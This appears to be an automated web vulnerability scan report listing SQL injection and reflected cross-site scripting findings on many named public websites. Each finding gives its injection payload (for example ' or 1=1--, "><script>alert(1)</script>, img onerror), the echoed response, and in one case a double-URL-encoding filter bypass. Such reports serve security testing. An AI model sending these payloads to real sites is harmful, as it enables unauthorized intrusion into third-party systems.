The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/ErrorHandler/CustomError.aspx?aspxerrorpath=/ErrorHandler/404.aspx'>here</a>.</h2> </body></html>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 52232181'%20or%201%3d1--%20 and 52232181'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /server-status on this server.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address> Server at www.alibris.com Port 8104</address> </body></html>
1.3. http://www.dogpile.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.dogpile.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10635560%20or%201%3d1--%20 and 10635560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<script type="text/javascript"> //<![CDATA[ var addthis_pub="arfie"; var addthis_brand="Dogpile"; var addthis_header_color="#ffffff"; var addthis_header_background="#2244fe"; var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/'; var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=d871434c075d4aa39d6d2a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=7C85U0KGPmVPPafG1zJiGA%3D%3D&_IceUrl=true'; //]]> </script> <a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addt ...[SNIP]...
<script type="text/javascript"> //<![CDATA[ var addthis_pub="arfie"; var addthis_brand="Dogpile"; var addthis_header_color="#ffffff"; var addthis_header_background="#2244fe"; var addthis_options="email, favorites, facebook, myspace, twitter, digg, delicious, stumbleupon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com/info.dogpl.rss/'; var callback_server_url = 'http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=1aeb70dcd7cc4a2781202a9503f1cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=x3eaeA9Nszsx12vh6l%2FEvw%3D%3D&_IceUrl=true'; //]]> </script> <a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 SN: 82 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 11:34:42 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... <h2>HTTP Error 404 - File or directory not found.<br> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found X-Powered-By: PHP/5.3.3 Status: 404 Not Found Content-Type: text/html; charset=utf-8 Server: Apache (Unix;) Content-Length: 19008 Vary: Accept-Encoding Date: Sat, 02 Apr 2011 11:43:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
1.7. http://www.rollingstone.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.rollingstone.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d530"><script>alert(1)</script>decd035a41f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba7b0"><script>alert(1)</script>aab5736d382 was submitted in the REST URL parameter 1. This input was echoed as ba7b0\"><script>alert(1)</script>aab5736d382 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fbafe</title><script>alert(1)</script>51dc9727092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39315'%3balert(1)//cc506767d1e was submitted in the REST URL parameter 1. This input was echoed as 39315';alert(1)//cc506767d1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55ec1<script>alert(1)</script>09975e326de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.6. http://www.cliffsnotes.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cliffsnotes.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da647--><script>alert(1)</script>bbe399773e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e795"><script>alert(1)</script>bbd5bdf34b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9370'-alert(1)-'aa120cc403f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 782dd--><a>b8cbf55db90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 11:46:30 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app2v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56207 Date: Sat, 02 Apr 2011 11:41:31 GMT X-Varnish: 877596055 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status782dd--><a>b8cbf55db90 --> ...[SNIP]...
2.10. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.craveonline.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 89416--><a>aa1cc4eed48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Sat, 02 Apr 2011 11:45:36 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app1v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56279 Date: Sat, 02 Apr 2011 11:40:36 GMT X-Varnish: 877594024 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy1v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 12-03-10, 08:52:39 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status?89416--><a>aa1cc4eed48=1 --> ...[SNIP]...
2.11. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.craveonline.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1118e'-alert(1)-'e109d638d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c5d<img%20src%3da%20onerror%3dalert(1)>c45223c93a6 was submitted in the REST URL parameter 1. This input was echoed as 13c5d<img src=a onerror=alert(1)>c45223c93a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ee74<script>alert(1)</script>9d7f21751d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.14. http://www.dummies.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dummies.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3afad--><script>alert(1)</script>b56567668b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7581b"><script>alert(1)</script>bc8d8474589 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.16. http://www.ecnext.com/server-status [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ecnext.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd672<script>alert(1)</script>127c627d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/cd672<script>alert(1)</script>127c627d58 at Sat Apr 2 07:48:51 2011 from 173.193.214.243<br> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d5e"><script>alert(1)</script>e11ba8f4b87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/72d5e"><script>alert(1)</script>e11ba8f4b87 at Sat Apr 2 07:48:50 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload e153f</title><script>alert(1)</script>e9fcdc9ddc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-statuse153f</title><script>alert(1)</script>e9fcdc9ddc5 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a564<script>alert(1)</script>98c0ca39ef5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</h1> ...[SNIP]...
2.20. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload f0ca2</title><script>alert(1)</script>c3ed3e5c06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status?f0ca2</title><script>alert(1)</script>c3ed3e5c06f=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body ...[SNIP]...
2.21. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0cc5<script>alert(1)</script>a9257fdb58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58db4"%3b2273c575d86 was submitted in the REST URL parameter 1. This input was echoed as 58db4";2273c575d86 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6779"><script>alert(1)</script>65d93b08fbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 02 Apr 2011 11:41:55 GMT Server: VoxCAST X-Powered-By: PHP/5.2.11 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from VoxCAST Content-Length: 40021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="h ...[SNIP]... <input type="hidden" name="returl" value="http://www.inc.com/server-statuse6779"><script>alert(1)</script>65d93b08fbb"> ...[SNIP]...
2.24. http://www.inc.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.inc.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ce9"><script>alert(1)</script>cc34791a254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 883fe</script><script>alert(1)</script>8e095b000b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.26. http://www.kaboose.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.kaboose.com
Path:
/server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 655aa</script><script>alert(1)</script>b38f926dd67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.27. http://www.manta.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e61d"><script>alert(1)</script>6cf64a7c5f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.28. http://www.manta.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f68f<script>alert(1)</script>2655fa9041f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.29. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf19d<script>alert(1)</script>223df9c9a1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.30. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a481e"><script>alert(1)</script>56fd9a4771c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.31. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d9e7<script>alert(1)</script>e54763e1d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.32. http://www.manta.com/coms2/page_about_manta_contact [REST URL parameter 2]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b442c"><script>alert(1)</script>236b91d1e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.33. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c303<script>alert(1)</script>0fc6d39308a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.34. http://www.manta.com/coms2/page_about_manta_contact [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/coms2/page_about_manta_contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3312a"><script>alert(1)</script>16834424f5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.35. http://www.manta.com/favicon.ico [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f79<script>alert(1)</script>398c3c5f236 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.36. http://www.manta.com/favicon.ico [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17737"><script>alert(1)</script>b035543d8ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.37. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6996<script>alert(1)</script>b2a19b0fbd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.38. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec1a"><script>alert(1)</script>9ad62a2019 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.39. http://www.manta.com/server-status [REST URL parameter 1]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.manta.com
Path:
/server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec5a8"><script>alert(1)</script>bb89e044910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.40. http://www.manta.com/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.manta.com
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2011<script>alert(1)</script>accfc3b90aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.41. http://www.mp3raid.com/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.mp3raid.com
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d5a"><script>alert(1)</script>5bc6dc87344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e448<script>alert(1)</script>022d3f904ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /server-status8e448<script>alert(1)</script>022d3f904ba not found!</h1> ...[SNIP]...
2.43. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mp3raid.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78a93<script>alert(1)</script>a2ff6b3677d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><TITLE>404 Page Not Fou ...[SNIP]... <h1>The page /server-status?78a93<script>alert(1)</script>a2ff6b3677d=1 not found!</h1> ...[SNIP]...
2.44. http://www.mp3raid.com/server-status [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mp3raid.com
Path: /server-status
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1c2"><script>alert(1)</script>c7547c9425e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4419</script><script>alert(1)</script>dfe86b4c3ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0ec1'%3bc6711997946 was submitted in the REST URL parameter 1. This input was echoed as d0ec1';c6711997946 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.47. http://www.mylifetime.com/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.mylifetime.com
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91e89"><a>10ecc96fc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
2.48. http://www.schoolfusion.us/server-status [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.schoolfusion.us
Path: /server-status
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1d661<script>alert(1)</script>a9d3e1ed519 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found
